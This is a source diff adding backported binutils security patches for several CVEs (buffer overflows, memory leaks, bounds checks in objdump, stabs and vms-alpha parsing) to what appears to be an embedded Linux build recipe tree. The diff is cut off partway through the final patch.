--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch
@@ -0,0 +1,183 @@
+From 1cfcf3004e1830f8fe9112cfcd15285508d2c2b7 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 11 Feb 2021 16:56:42 +1030
+Subject: [PATCH] PR27290, PR27293, PR27295, various avr objdump fixes
+
+Adds missing sanity checks for avr device info note, to avoid
+potential buffer overflows. Uses bfd_malloc_and_get_section for
+sanity checking section size.
+
+ PR 27290
+ PR 27293
+ PR 27295
+ * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting.
+ Use bfd_malloc_and_get_section.
+ (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity
+ check namesz. Return NULL if descsz is too small. Ensure
+ string table is terminated.
+ (elf32_avr_get_device_info): Formatting. Add note_size param.
+ Sanity check note.
+ (elf32_avr_dump_mem_usage): Adjust to suit.
+
+Upstream-Status: Backport
+CVE: CVE-2021-3549
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+diff --git a/binutils/ChangeLog b/binutils/ChangeLog
+index 1e9a96c9bb6..02e5019204e 100644
+--- a/binutils/ChangeLog
++++ b/binutils/ChangeLog
+@@ -1,3 +1,17 @@
++2021-02-11 Alan Modra <amodra@gmail.com>
++
++ PR 27290
++ PR 27293
++ PR 27295
++ * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting.
++ Use bfd_malloc_and_get_section.
++ (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity
++ check namesz. Return NULL if descsz is too small. Ensure
++ string table is terminated.
++ (elf32_avr_get_device_info): Formatting. Add note_size param.
++ Sanity check note.
++ (elf32_avr_dump_mem_usage): Adjust to suit.
++
+ 2020-03-25 H.J. Lu <hongjiu.lu@intel.com>
+
+ * ar.c (main): Update bfd_plugin_set_program_name call.
+diff --git a/binutils/od-elf32_avr.c b/binutils/od-elf32_avr.c
+index 5ec99957fe9..1d32bce918e 100644
+--- a/binutils/od-elf32_avr.c
++++ b/binutils/od-elf32_avr.c
+@@ -77,23 +77,29 @@ elf32_avr_filter (bfd *abfd)
+ return bfd_get_flavour (abfd) == bfd_target_elf_flavour;
+ }
+
+-static char*
++static char *
+ elf32_avr_get_note_section_contents (bfd *abfd, bfd_size_type *size)
+ {
+ asection *section;
++ bfd_byte *contents;
+
+- if ((section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo")) == NULL)
++ section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo");
++ if (section == NULL)
+ return NULL;
+
+- *size = bfd_section_size (section);
+- char *contents = (char *) xmalloc (*size);
+- bfd_get_section_contents (abfd, section, contents, 0, *size);
++ if (!bfd_malloc_and_get_section (abfd, section, &contents))
++ {
++ free (contents);
++ contents = NULL;
++ }
+
+- return contents;
++ *size = bfd_section_size (section);
++ return (char *) contents;
+ }
+
+-static char* elf32_avr_get_note_desc (bfd *abfd, char *contents,
+- bfd_size_type size)
++static char *
++elf32_avr_get_note_desc (bfd *abfd, char *contents, bfd_size_type size,
++ bfd_size_type *descsz)
+ {
+ Elf_External_Note *xnp = (Elf_External_Note *) contents;
+ Elf_Internal_Note in;
+@@ -107,42 +113,54 @@ static char* elf32_avr_get_note_desc (bfd *abfd, char *contents,
+ if (in.namesz > contents - in.namedata + size)
+ return NULL;
+
++ if (in.namesz != 4 || strcmp (in.namedata, "AVR") != 0)
++ return NULL;
++
+ in.descsz = bfd_get_32 (abfd, xnp->descsz);
+ in.descdata = in.namedata + align_power (in.namesz, 2);
+- if (in.descsz != 0
+- && (in.descdata >= contents + size
+- || in.descsz > contents - in.descdata + size))
++ if (in.descsz < 6 * sizeof (uint32_t)
++ || in.descdata >= contents + size
++ || in.descsz > contents - in.descdata + size)
+ return NULL;
+
+- if (strcmp (in.namedata, "AVR") != 0)
+- return NULL;
++ /* If the note has a string table, ensure it is 0 terminated. */
++ if (in.descsz > 8 * sizeof (uint32_t))
++ in.descdata[in.descsz - 1] = 0;
+
++ *descsz = in.descsz;
+ return in.descdata;
+ }
+
+ static void
+ elf32_avr_get_device_info (bfd *abfd, char *description,
+- deviceinfo *device)
++ bfd_size_type desc_size, deviceinfo *device)
+ {
+ if (description == NULL)
+ return;
+
+ const bfd_size_type memory_sizes = 6;
+
+- memcpy (device, description, memory_sizes * sizeof(uint32_t));
+- device->name = NULL;
++ memcpy (device, description, memory_sizes * sizeof (uint32_t));
++ desc_size -= memory_sizes * sizeof (uint32_t);
++ if (desc_size < 8)
++ return;
+
+- uint32_t *stroffset_table = ((uint32_t *) description) + memory_sizes;
++ uint32_t *stroffset_table = (uint32_t *) description + memory_sizes;
+ bfd_size_type stroffset_table_size = bfd_get_32 (abfd, stroffset_table);
+- char *str_table = ((char *) stroffset_table) + stroffset_table_size;
+
+ /* If the only content is the size itself, there's nothing in the table */
+- if (stroffset_table_size == 4)
++ if (stroffset_table_size < 8)
+ return;
++ if (desc_size <= stroffset_table_size)
++ return;
++ desc_size -= stroffset_table_size;
+
+ /* First entry is the device name index. */
+ uint32_t device_name_index = bfd_get_32 (abfd, stroffset_table + 1);
++ if (device_name_index >= desc_size)
++ return;
+
++ char *str_table = (char *) stroffset_table + stroffset_table_size;
+ device->name = str_table + device_name_index;
+ }
+
+@@ -183,7 +201,7 @@ static void
+ elf32_avr_dump_mem_usage (bfd *abfd)
+ {
+ char *description = NULL;
+- bfd_size_type note_section_size = 0;
++ bfd_size_type sec_size, desc_size;
+
+ deviceinfo device = { 0, 0, 0, 0, 0, 0, NULL };
+ device.name = "Unknown";
+@@ -192,13 +210,13 @@ elf32_avr_dump_mem_usage (bfd *abfd)
+ bfd_size_type text_usage = 0;
+ bfd_size_type eeprom_usage = 0;
+
+- char *contents = elf32_avr_get_note_section_contents (abfd,
+- &note_section_size);
++ char *contents = elf32_avr_get_note_section_contents (abfd, &sec_size);
+
+ if (contents != NULL)
+ {
+- description = elf32_avr_get_note_desc (abfd, contents, note_section_size);
+- elf32_avr_get_device_info (abfd, description, &device);
++ description = elf32_avr_get_note_desc (abfd, contents, sec_size,
++ &desc_size);
++ elf32_avr_get_device_info (abfd, description, desc_size, &device);
+ }
+
+ elf32_avr_get_memory_usage (abfd, &text_usage, &data_usage,
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch
new file mode 100644
index 0000000000..2addf5139e
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch
@@ -0,0 +1,35 @@
+From 46322722ad40ac1a75672ae0f62f4969195f1368 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 20 Jan 2022 13:58:38 +1030
+Subject: [PATCH] PR28753, buffer overflow in read_section_stabs_debugging_info
+
+ PR 28753
+ * rddbg.c (read_section_stabs_debugging_info): Don't read past
+ end of section when concatenating stab strings.
+
+CVE: CVE-2021-46174
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=cad4d6b91e97]
+
+(cherry picked from commit 085b299b71721e15f5c5c5344dc3e4e4536dadba)
+(cherry picked from commit cad4d6b91e97b6962807d33c04ed7e7797788438)
+Signed-off-by: poojitha adireddy <pooadire@cisco.com>
+---
+ binutils/rddbg.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/binutils/rddbg.c b/binutils/rddbg.c
+index 72e934055b5..5e76d94a3c4 100644
+--- a/binutils/rddbg.c
++++ b/binutils/rddbg.c
+@@ -207,7 +207,7 @@ read_section_stabs_debugging_info (bfd *abfd, asymbol **syms, long symcount,
+ an attempt to read the byte before 'strings' would occur. */
+ while ((len = strlen (s)) > 0
+ && s[len - 1] == '\\'
+- && stab + 12 < stabs + stabsize)
++ && stab + 16 <= stabs + stabsize)
+ {
+ char *p;
+
+--
+2.23.1
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch
new file mode 100644
index 0000000000..102d65f8a6
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch
@@ -0,0 +1,37 @@
+From ef186fe54aa6d281a3ff8a9528417e5cc614c797 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Sat, 13 Aug 2022 15:32:47 +0930
+Subject: [PATCH] PR29482 - strip: heap-buffer-overflow
+
+ PR 29482
+ * coffcode.h (coff_set_section_contents): Sanity check _LIB.
+
+CVE: CVE-2022-38533
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=ef186fe54aa6d281a3ff8a9528417e5cc614c797]
+
+Signed-off-by: Florin Diaconescu <florin.diaconescu009@gmail.com>
+
+---
+ bfd/coffcode.h | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/bfd/coffcode.h b/bfd/coffcode.h
+index dec2e9c6370..75c18d88602 100644
+--- a/bfd/coffcode.h
++++ b/bfd/coffcode.h
+@@ -4170,10 +4170,13 @@ coff_set_section_contents (bfd * abfd,
+
+ rec = (bfd_byte *) location;
+ recend = rec + count;
+- while (rec < recend)
++ while (recend - rec >= 4)
+ {
++ size_t len = bfd_get_32 (abfd, rec);
++ if (len == 0 || len > (size_t) (recend - rec) / 4)
++ break;
++ rec += len * 4;
+ ++section->lma;
+- rec += bfd_get_32 (abfd, rec) * 4;
+ }
+
+ BFD_ASSERT (rec == recend);
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch
new file mode 100644
index 0000000000..ddb564bc8c
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch
@@ -0,0 +1,32 @@
+From 0ebc886149c22aceaf8ed74267821a59ca9d03eb Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Jun 2022 09:00:41 +0930
+Subject: [PATCH] PR29254, memory leak in stab_demangle_v3_arg
+
+ PR 29254
+ * stabs.c (stab_demangle_v3_arg): Free dt on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=0ebc886149c22aceaf8ed74267821a59ca9d03eb]
+CVE: CVE-2022-47007
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/stabs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 2b5241637c1..796ff85b86a 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -5476,7 +5476,10 @@
+ dc->u.s_binary.right,
+ &varargs);
+ if (pargs == NULL)
+- return NULL;
++ {
++ free (dt);
++ return NULL;
++ }
+
+ return debug_make_function_type (dhandle, dt, pargs, varargs);
+ }
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch
new file mode 100644
index 0000000000..9527390ccf
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch
@@ -0,0 +1,64 @@
+From d6e1d48c83b165c129cb0aa78905f7ca80a1f682 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Jun 2022 09:13:38 +0930
+Subject: [PATCH] PR29255, memory leak in make_tempdir
+
+ PR 29255
+ * bucomm.c (make_tempdir, make_tempname): Free template on all
+ failure paths.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=d6e1d48c83b165c129cb0aa78905f7ca80a1f682]
+CVE: CVE-2022-47008
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/bucomm.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+diff --git a/binutils/bucomm.c b/binutils/bucomm.c
+index fdc2209df9c..4395cb9f7f5 100644
+--- a/binutils/bucomm.c
++++ b/binutils/bucomm.c
+@@ -542,8 +542,9 @@
+ #else
+ tmpname = mktemp (tmpname);
+ if (tmpname == NULL)
+- return NULL;
+- fd = open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);
++ fd = -1;
++ else
++ fd = open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);
+ #endif
+ if (fd == -1)
+ {
+@@ -561,22 +562,23 @@
+ make_tempdir (const char *filename)
+ {
+ char *tmpname = template_in_dir (filename);
++ char *ret;
+
+ #ifdef HAVE_MKDTEMP
+- return mkdtemp (tmpname);
++ ret = mkdtemp (tmpname);
+ #else
+- tmpname = mktemp (tmpname);
+- if (tmpname == NULL)
+- return NULL;
++ ret = mktemp (tmpname);
+ #if defined (_WIN32) && !defined (__CYGWIN32__)
+ if (mkdir (tmpname) != 0)
+- return NULL;
++ ret = NULL;
+ #else
+ if (mkdir (tmpname, 0700) != 0)
+- return NULL;
++ ret = NULL;
+ #endif
+- return tmpname;
+ #endif
++ if (ret == NULL)
++ free (tmpname);
++ return ret;
+ }
+
+ /* Parse a string into a VMA, with a fatal error if it can't be
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch
new file mode 100644
index 0000000000..d831ed4756
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch
@@ -0,0 +1,34 @@
+From 0d02e70b197c786f26175b9a73f94e01d14abdab Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 20 Jun 2022 10:39:31 +0930
+Subject: [PATCH] PR29262, memory leak in pr_function_type
+
+ PR 29262
+ * prdbg.c (pr_function_type): Free "s" on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=0d02e70b197c786f26175b9a73f94e01d14abdab]
+CVE: CVE-2022-47010
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/prdbg.c | 7 ++-----
+ 1 file changed, 2 insertions(+), 5 deletions(-)
+
+diff --git a/binutils/prdbg.c b/binutils/prdbg.c
+index c1e41628d26..bb42a5b6c2d 100644
+--- a/binutils/prdbg.c
++++ b/binutils/prdbg.c
+@@ -778,12 +778,9 @@
+
+ strcat (s, ")");
+
+- if (! substitute_type (info, s))
+- return FALSE;
+-
++ bfd_boolean ret = substitute_type (info, s);
+ free (s);
+-
+- return TRUE;
++ return ret;
+ }
+
+ /* Turn the top type on the stack into a reference to that type. */
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch
new file mode 100644
index 0000000000..250756bd38
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch
@@ -0,0 +1,31 @@
+From 8a24927bc8dbf6beac2000593b21235c3796dc35 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 20 Jun 2022 10:39:13 +0930
+Subject: [PATCH] PR29261, memory leak in parse_stab_struct_fields
+
+ PR 29261
+ * stabs.c (parse_stab_struct_fields): Free "fields" on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=8a24927bc8dbf6beac2000593b21235c3796dc35]
+CVE: CVE-2022-47011
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/stabs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 796ff85b86a..bf3f578cbcc 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -2368,7 +2368,10 @@
+
+ if (! parse_stab_one_struct_field (dhandle, info, pp, p, fields + c,
+ staticsp, p_end))
+- return FALSE;
++ {
++ free (fields);
++ return FALSE;
++ }
+
+ ++c;
+ }
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch
new file mode 100644
index 0000000000..101a4cdb4e
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch
@@ -0,0 +1,57 @@
+From 3d3af4ba39e892b1c544d667ca241846bc3df386 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Sun, 4 Dec 2022 22:15:40 +1030
+Subject: [PATCH] PR29846, segmentation fault in objdump.c compare_symbols
+
+Fixes a fuzzed object file problem where plt relocs were manipulated
+in such a way that two synthetic symbols were generated at the same
+plt location. Won't occur in real object files.
+
+ PR 29846
+ PR 20337
+ * objdump.c (compare_symbols): Test symbol flags to exclude
+ section and synthetic symbols before attempting to check flavour.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff;h=3d3af4ba39e892b1c544d667ca241846bc3df386]
+CVE: CVE-2022-47695
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/objdump.c | 23 ++++++++++-------------
+ 1 file changed, 10 insertions(+), 13 deletions(-)
+
+diff --git a/binutils/objdump.c b/binutils/objdump.c
+index e8481b2d928..d95c8b68bf0 100644
+--- a/binutils/objdump.c
++++ b/binutils/objdump.c
+@@ -935,20 +935,17 @@
+ return 1;
+ }
+
+- if (bfd_get_flavour (bfd_asymbol_bfd (a)) == bfd_target_elf_flavour
++ /* Sort larger size ELF symbols before smaller. See PR20337. */
++ bfd_vma asz = 0;
++ if ((a->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0
++ && bfd_get_flavour (bfd_asymbol_bfd (a)) == bfd_target_elf_flavour)
++ asz = ((elf_symbol_type *) a)->internal_elf_sym.st_size;
++ bfd_vma bsz = 0;
++ if ((b->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0
+ && bfd_get_flavour (bfd_asymbol_bfd (b)) == bfd_target_elf_flavour)
+- {
+- bfd_vma asz, bsz;
+-
+- asz = 0;
+- if ((a->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0)
+- asz = ((elf_symbol_type *) a)->internal_elf_sym.st_size;
+- bsz = 0;
+- if ((b->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0)
+- bsz = ((elf_symbol_type *) b)->internal_elf_sym.st_size;
+- if (asz != bsz)
+- return asz > bsz ? -1 : 1;
+- }
++ bsz = ((elf_symbol_type *) b)->internal_elf_sym.st_size;
++ if (asz != bsz)
++ return asz > bsz ? -1 : 1;
+
+ /* Symbols that start with '.' might be section names, so sort them
+ after symbols that don't start with '.'. */
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch
new file mode 100644
index 0000000000..f41c02a02b
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch
@@ -0,0 +1,49 @@
+From 75393a2d54bcc40053e5262a3de9d70c5ebfbbfd Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Wed, 21 Dec 2022 11:51:23 +0000
+Subject: [PATCH] Fix an attempt to allocate an unreasonably large amount of
+ memory when parsing a corrupt ELF file.
+
+ PR 29924
+ * objdump.c (load_specific_debug_section): Check for excessively
+ large sections.
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=75393a2d54bcc40053e5262a3de9d70c5ebfbbfd]
+CVE: CVE-2022-48063
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/ChangeLog | 6 ++++++
+ binutils/objdump.c | 4 +++-
+ 2 files changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/ChangeLog b/binutils/ChangeLog
+index e7f918d3f65..020e09f3700 100644
+--- a/binutils/ChangeLog
++++ b/binutils/ChangeLog
+@@ -1,3 +1,9 @@
++2022-12-21 Nick Clifton <nickc@redhat.com>
++
++ PR 29924
++ * objdump.c (load_specific_debug_section): Check for excessively
++ large sections.
++
+ 2021-02-11 Alan Modra <amodra@gmail.com>
+
+ PR 27290
+
+diff --git a/binutils/objdump.c b/binutils/objdump.c
+index d51abbe3858..2eb02de0e76 100644
+--- a/binutils/objdump.c
++++ b/binutils/objdump.c
+@@ -3479,7 +3479,9 @@
+ section->size = bfd_section_size (sec);
+ /* PR 24360: On 32-bit hosts sizeof (size_t) < sizeof (bfd_size_type). */
+ alloced = amt = section->size + 1;
+- if (alloced != amt || alloced == 0)
++ if (alloced != amt
++ || alloced == 0
++ || (bfd_get_size (abfd) != 0 && alloced >= bfd_get_size (abfd)))
+ {
+ section->start = NULL;
+ free_debug_section (debug);
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch b/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
new file mode 100644
index 0000000000..732ea43210
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
@@ -0,0 +1,530 @@
+CVE: CVE-2023-25584
+Upstream-Status: Backport [ import from ubuntu http://archive.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.34-6ubuntu1.7.debian.tar.xz upstream https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=77c225bdeb410cf60da804879ad41622f5f1aa44 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+[Ubuntu note: this is a backport of the original patch, with no major changes
+ other than fixing the patch to apply to this release]
+From 77c225bdeb410cf60da804879ad41622f5f1aa44 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 12 Dec 2022 18:28:49 +1030
+Subject: [PATCH] Lack of bounds checking in vms-alpha.c parse_module
+
+ PR 29873
+ PR 29874
+ PR 29875
+ PR 29876
+ PR 29877
+ PR 29878
+ PR 29879
+ PR 29880
+ PR 29881
+ PR 29882
+ PR 29883
+ PR 29884
+ PR 29885
+ PR 29886
+ PR 29887
+ PR 29888
+ PR 29889
+ PR 29890
+ PR 29891
+ * vms-alpha.c (parse_module): Make length param bfd_size_type.
+ Delete length == -1 checks. Sanity check record_length.
+ Sanity check DST__K_MODBEG, DST__K_RTNBEG, DST__K_RTNEND lengths.
+ Sanity check DST__K_SOURCE and DST__K_LINE_NUM elements
+ before accessing.
+ (build_module_list): Pass dst_section size to parse_module.
+---
+ bfd/vms-alpha.c | 213 ++++++++++++++++++++++++++++++++++++++----------
+ 1 file changed, 168 insertions(+), 45 deletions(-)
+
+--- binutils-2.34.orig/bfd/vms-alpha.c
++++ binutils-2.34/bfd/vms-alpha.c
+@@ -4267,7 +4267,7 @@ new_module (bfd *abfd)
+
+ static void
+ parse_module (bfd *abfd, struct module *module, unsigned char *ptr,
+- int length)
++ bfd_size_type length)
+ {
+ unsigned char *maxptr = ptr + length;
+ unsigned char *src_ptr, *pcl_ptr;
+@@ -4284,7 +4284,7 @@ parse_module (bfd *abfd, struct module *
+ curr_line = (struct lineinfo *) bfd_zalloc (abfd, sizeof (struct lineinfo));
+ module->line_table = curr_line;
+
+- while (length == -1 || ptr < maxptr)
++ while (ptr < maxptr)
+ {
+ /* The first byte is not counted in the recorded length. */
+ int rec_length = bfd_getl16 (ptr) + 1;
+@@ -4292,15 +4292,19 @@ parse_module (bfd *abfd, struct module *
+
+ vms_debug2 ((2, "DST record: leng %d, type %d\n", rec_length, rec_type));
+
+- if (length == -1 && rec_type == DST__K_MODEND)
++ if (rec_length > maxptr - ptr)
++ break;
++ if (rec_type == DST__K_MODEND)
+ break;
+
+ switch (rec_type)
+ {
+ case DST__K_MODBEG:
++ if (rec_length <= DST_S_B_MODBEG_NAME)
++ break;
+ module->name
+ = _bfd_vms_save_counted_string (abfd, ptr + DST_S_B_MODBEG_NAME,
+- maxptr - (ptr + DST_S_B_MODBEG_NAME));
++ rec_length - DST_S_B_MODBEG_NAME);
+
+ curr_pc = 0;
+ prev_pc = 0;
+@@ -4314,11 +4318,13 @@ parse_module (bfd *abfd, struct module *
+ break;
+
+ case DST__K_RTNBEG:
++ if (rec_length <= DST_S_B_RTNBEG_NAME)
++ break;
+ funcinfo = (struct funcinfo *)
+ bfd_zalloc (abfd, sizeof (struct funcinfo));
+ funcinfo->name
+ = _bfd_vms_save_counted_string (abfd, ptr + DST_S_B_RTNBEG_NAME,
+- maxptr - (ptr + DST_S_B_RTNBEG_NAME));
++ rec_length - DST_S_B_RTNBEG_NAME);
+ funcinfo->low = bfd_getl32 (ptr + DST_S_L_RTNBEG_ADDRESS);
+ funcinfo->next = module->func_table;
+ module->func_table = funcinfo;
+@@ -4328,6 +4334,8 @@ parse_module (bfd *abfd, struct module *
+ break;
+
+ case DST__K_RTNEND:
++ if (rec_length < DST_S_L_RTNEND_SIZE + 4)
++ break;
+ module->func_table->high = module->func_table->low
+ + bfd_getl32 (ptr + DST_S_L_RTNEND_SIZE) - 1;
+
+@@ -4358,13 +4366,66 @@ parse_module (bfd *abfd, struct module *
+
+ vms_debug2 ((3, "source info\n"));
+
+- while (src_ptr < ptr + rec_length)
++ while (src_ptr - ptr < rec_length)
+ {
+ int cmd = src_ptr[0], cmd_length, data;
+
+ switch (cmd)
+ {
+ case DST__K_SRC_DECLFILE:
++ if (src_ptr - ptr + DST_S_B_SRC_DF_LENGTH >= rec_length)
++ cmd_length = 0x10000;
++ else
++ cmd_length = src_ptr[DST_S_B_SRC_DF_LENGTH] + 2;
++ break;
++
++ case DST__K_SRC_DEFLINES_B:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SRC_DEFLINES_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SRC_INCRLNUM_B:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SRC_SETFILE:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SRC_SETLNUM_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SRC_SETLNUM_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SRC_SETREC_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SRC_SETREC_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SRC_FORMFEED:
++ cmd_length = 1;
++ break;
++
++ default:
++ cmd_length = 2;
++ break;
++ }
++
++ if (src_ptr - ptr + cmd_length > rec_length)
++ break;
++
++ switch (cmd)
++ {
++ case DST__K_SRC_DECLFILE:
+ {
+ unsigned int fileid
+ = bfd_getl16 (src_ptr + DST_S_W_SRC_DF_FILEID);
+@@ -4384,7 +4445,6 @@ parse_module (bfd *abfd, struct module *
+
+ module->file_table [fileid].name = filename;
+ module->file_table [fileid].srec = 1;
+- cmd_length = src_ptr[DST_S_B_SRC_DF_LENGTH] + 2;
+ vms_debug2 ((4, "DST_S_C_SRC_DECLFILE: %d, %s\n",
+ fileid, module->file_table [fileid].name));
+ }
+@@ -4401,7 +4461,6 @@ parse_module (bfd *abfd, struct module *
+ srec->sfile = curr_srec->sfile;
+ curr_srec->next = srec;
+ curr_srec = srec;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST_S_C_SRC_DEFLINES_B: %d\n", data));
+ break;
+
+@@ -4416,14 +4475,12 @@ parse_module (bfd *abfd, struct module *
+ srec->sfile = curr_srec->sfile;
+ curr_srec->next = srec;
+ curr_srec = srec;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST_S_C_SRC_DEFLINES_W: %d\n", data));
+ break;
+
+ case DST__K_SRC_INCRLNUM_B:
+ data = src_ptr[DST_S_B_SRC_UNSBYTE];
+ curr_srec->line += data;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST_S_C_SRC_INCRLNUM_B: %d\n", data));
+ break;
+
+@@ -4431,21 +4488,18 @@ parse_module (bfd *abfd, struct module *
+ data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
+ curr_srec->sfile = data;
+ curr_srec->srec = module->file_table[data].srec;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST_S_C_SRC_SETFILE: %d\n", data));
+ break;
+
+ case DST__K_SRC_SETLNUM_L:
+ data = bfd_getl32 (src_ptr + DST_S_L_SRC_UNSLONG);
+ curr_srec->line = data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST_S_C_SRC_SETLNUM_L: %d\n", data));
+ break;
+
+ case DST__K_SRC_SETLNUM_W:
+ data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
+ curr_srec->line = data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST_S_C_SRC_SETLNUM_W: %d\n", data));
+ break;
+
+@@ -4453,7 +4507,6 @@ parse_module (bfd *abfd, struct module *
+ data = bfd_getl32 (src_ptr + DST_S_L_SRC_UNSLONG);
+ curr_srec->srec = data;
+ module->file_table[curr_srec->sfile].srec = data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST_S_C_SRC_SETREC_L: %d\n", data));
+ break;
+
+@@ -4461,19 +4514,16 @@ parse_module (bfd *abfd, struct module *
+ data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
+ curr_srec->srec = data;
+ module->file_table[curr_srec->sfile].srec = data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST_S_C_SRC_SETREC_W: %d\n", data));
+ break;
+
+ case DST__K_SRC_FORMFEED:
+- cmd_length = 1;
+ vms_debug2 ((4, "DST_S_C_SRC_FORMFEED\n"));
+ break;
+
+ default:
